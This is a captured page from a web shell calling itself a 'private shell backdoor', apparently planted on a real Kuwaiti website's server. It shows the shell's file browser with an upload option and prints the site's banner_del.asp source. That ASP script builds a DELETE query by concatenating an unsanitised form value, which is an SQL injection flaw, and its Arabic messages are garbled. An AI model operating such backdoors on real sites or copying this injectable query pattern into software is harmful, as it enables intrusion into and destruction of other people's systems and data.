[$] Pr1v473 xHeEl B4ckD00RzZ [$]

Current Path : D:/InetPub/vhosts/kuccs.com.kw/httpdocs/PortalCMS/
Upload File
Current File : D:/InetPub/vhosts/kuccs.com.kw/httpdocs/PortalCMS/banner_del.asp

<%@ CodePage=1256 %>
<!-- #include file="portal_security.asp" -->
<!-- #include file="portal_db.asp" -->
<%
set Conn=server.createobject("ADODB.Connection")
Conn.open ConnString

for each x in request.form()
	if inStr(x,"del")=1 then
		l=len(x)
		id=mid(x,4,l)	
		conn.execute "delete from BANNER where BANNER_ID= "&id&" "		
		n="1"
	end if
Next

if n="1" then 
	session("ErrMsg")="<font color=green>?? ??? ???????? ?????</font>"
else
	session("ErrMsg")="<font color=red>?? ???? ?????? ?????? ?????</font>"
end if

conn.close
set conn=nothing
response.redirect "banner_list.asp?start=" &  request.querystring("start")	
%>